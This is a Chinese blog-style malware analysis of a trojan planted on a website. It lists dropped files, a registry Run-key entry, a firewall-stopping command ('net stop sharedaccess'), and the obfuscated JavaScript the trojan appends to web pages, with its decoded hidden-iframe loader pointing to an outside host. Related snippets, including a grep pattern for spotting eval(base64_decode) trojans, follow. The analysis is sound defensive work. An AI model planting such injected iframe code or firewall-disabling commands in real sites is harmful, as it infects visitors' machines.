解读网站被挂其中木马分析js+eval实现

在FF看到这消息.. 于是就把网页解开了..
原来是"老朋友"刺客集团 .. 已经多次和这个集团生成的网马打交道了..

其中挂上一个木马
hxxp://www.es86.com/pic/ddb/2006692151148920.gif

就此做个分析吧..
运行样本.
释放文件
C:\win30.exe
调用cmd 运行命令 /c net stop sharedaccess

访问网站
61.129.102.79
地址应该是:hxxp://www.es86.com 80端口通讯

下载:hxxp://www.es86.com/es86/db/dvbbs.mdb
此文件为rar 文件..

dvbbs.mdb 释放出文件为
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eCompress.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eImgConverter.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eLIB.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\HideProc.dll
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\internet.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\krnln.fnr
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\mop
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\moz
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\Nhook.dll
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\shell.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe

写入注册表
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"svchost"="C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe"

在 htm 和 aspx 尾部加入代码
<script>
p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,97,45,108,46,109,101,105,98,117,46,99,111,109,47,34,62,60,47,105,102,114,97,109,101,62"
p=eval("String.fromCharCode("+p+")");
document.write(p);</script>

解密为
<script>
p="<iframe height=0 width=0 src="http://a-l.meibu.com/"></iframe>"
p=eval("String.fromCharCode("+p+")");
document.write(p);</script>

在线扫描
AntiVir 7.3.1.38 03.02.2007 TR/Crypt.NSPM.Gen 
BitDefender 7.2 03.02.2007 DeepScan:Generic.Malware.PWYddldPk.D212BB22 
eSafe 7.0.14.0 02.28.2007 suspicious Trojan/Worm 
F-Secure 6.70.13030.0 03.02.2007 W32/Downloader 
Ikarus T3.1.1.3 03.02.2007 Backdoor.Win32.Hupigon.BV 
NOD32v2 2090 03.02.2007 a variant of Win32/Delf.AG 
Norman 5.80.02 03.02.2007 W32/Downloader 
Panda 9.0.0.4 03.01.2007 Suspicious file

以上分析都在虚拟机里完成的..
这次加的壳实在脱不开..无法查看更详细..

不过猜测 编写语言为 Borland Delphi 6.0 - 7.0
尝试关闭一些安全软件 估计也有..

=.= 再此感叹..这什么破壳..

(0)

相关推荐

  • 解读网站被挂其中木马分析js+eval实现

    在FF看到这消息.. 于是就把网页解开了.. 原来是"老朋友"刺客集团 .. 已经多次和这个集团生成的网马打交道了.. 其中挂上一个木马 hxxp://www.es86.com/pic/ddb/2006692151148920.gif 就此做个分析吧.. 运行样本. 释放文件 C:\win30.exe 调用cmd 运行命令 /c net stop sharedaccess 访问网站 61.129.102.79 地址应该是:hxxp://www.es86.com 80端口通讯 下载:hx

  • 一行代码解决网站防挂IFRAME木马方案,小鸽子序列(灵儿)

    最近公司和好朋友的网站纷纷被IFRAME了,有的挂上了鸽子,有的疯狂地弹窗,有的给人家增加流量.一个个文件去查找替换那些IFRAME代码,刚松口气,不久又加上去了,哎,什么世道!于是他们向我这个"JS高手"(他们强加给我的)求救,我也不能等闲视之,只好击键杀杀杀了. 因为FF(Firefox)不怕IFRAME,于是就拿IE开刀,不知道比尔有没有奖发.我只写了一句代码,就搞定了,哈,痛快.就是IE only(特有的)的CSS中的属性expression,插进去试试,果然那些IFRAME不

  • php网站被挂木马后的修复方法总结

    本文实例总结了php网站被挂木马后的修复方法.分享给大家供大家参考.具体方法如下: 在linux中我们可以使用命令来搜查木马文件,到代码安装目录执行下面命令 复制代码 代码如下: find ./ -iname "*.php" | xargs grep -H -n "eval(base64_decode" 搜出来接近100条结果,这个结果列表很重要,木马都在里面,要一个一个文件打开验证是否是木马,如果是,马上删除掉 最后找到10个木马文件,存放在各种目录,都是php

  • js eval木马代码,以后再分析吧

    从下面的木马中,发现的书写js的另一方法 p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,97,45,108,46,109,101,105,98,117,46,99,111,109,47,34,62,60,47,105,102,114,97,109,101,62";

  • 让McAfee来终结网站被挂马的时代图文教程

    让McAfee来终结网站被挂马的时代图文教程

    很多站长因为使用网上不常见的程序,有漏洞得不到补丁:而自己又没有编程能力无法修复或者干脆不知道漏洞在那里,被挂马后恢复程序结果不久又被挂--还有很多人即使使用的是应用比较广泛的程序,但也可能因为没及时打上补丁或出了漏洞官方还未发现而被挂马. 老是被挂也不是个事.怎么才能彻底杜绝被挂马呢?让程序完美,没有任何漏洞?这个可能性好象接近于0.我们只能从其他的地方想办法. 首先来看一下马是怎么挂上去的.首先,"黑客"会找到一个漏洞,然后利用这个漏洞上传一个后门程序上去以取得WEBSHELL,这

  • 防止网站被采集的理论分析以及十条方法对策第1/2页

    相同点: a. 两者都需要直接抓取到网页源码才能有效工作, b. 两者单位时间内会多次大量抓取被访问的网站内容; c. 宏观上来讲两者IP都会变动; d. 两者多没耐心的去破解你对网页的一些加密(验证),比如网页内容通过js文件加密,比如需要输入验证码才能浏览内容,比如需要登录才能访问内容等. 不同点:        搜索引擎爬虫先忽略整个网页源码脚本和样式以及html标签代码,然后对剩下的文字部分进行切词语法句法分析等一系列的复杂处理.而采集器一般是通过 html标签特点来抓取需要的数据,在制

  • .NET新能源汽车锂电池检测程序UI挂死问题分析

    .NET新能源汽车锂电池检测程序UI挂死问题分析

    目录 一:背景 1. 讲故事 二: Windbg 分析 1. 程序现象 2. 理解 WindowsFormsSynchronizationContext 3. 卡死的真正原因 4. 7号线程到底创建了什么控件 三:总结 一:背景 1. 讲故事 这世间事说来也奇怪,近两个月有三位朋友找到我,让我帮忙分析下他的程序hangon现象,这三个dump分别涉及: 医疗,新能源,POS系统.截图如下: 那这篇为什么要拿其中的 新能源 说事呢? 因为这位朋友解决的最顺利,在提供的一些线索后比较顺利的找出了问题

  • JVM完全解读之Metaspace解密源码分析

    概述 metaspace,顾名思义,元数据空间,专门用来存元数据的,它是jdk8里特有的数据结构用来替代perm,这块空间很有自己的特点,前段时间公司这块的问题太多了,主要是因为升级了中间件所致,看到大家讨论来讨论去,看得出很多人对metaspace还是模棱两可,不是很了解它,因此我觉得有必要写篇文章来介绍一下它,解开它神秘的面纱,当我们再次碰到它的相关问题的时候不会再感到束手无策. 通过这篇文章,你将可以了解到 为什么会有metaspace metaspace的组成 metaspace的VM参

  • js eval函数使用,js对象和字符串互转实例

    JavaScript eval() 函数 JavaScript 全局函数 定义和用法 eval() 函数计算 JavaScript 字符串,并把它作为脚本代码来执行. 如果参数是一个表达式,eval() 函数将执行表达式.如果参数是Javascript语句,eval()将执行 Javascript 语句. 语法 eval(string) 参数 描述 string 必需.要计算的字符串,其中含有要计算的 JavaScript 表达式或要执行的语句. <!DOCTYPE html> <htm

  • 对js eval()函数的一些见解

    一.eval是基本使用规则 •1 eval() 函数可计算某个字符串,并执行其中的的 JavaScript 代码. •2 eval(string) •3 string必需.要计算的字符串,其中含有要计算的 JavaScript 表达式或要执行的语句. •4 eval()只有一个参数. •5 eval使用比较不安全,忘慎重使用 二.eval的错误使用方法 •1 如果传入的参数不是字符串,它直接返回这个函数. •2 如果参数是字符串,它会把字符串当成JavaScript代码进行编译,如果编译失败者抛

随机推荐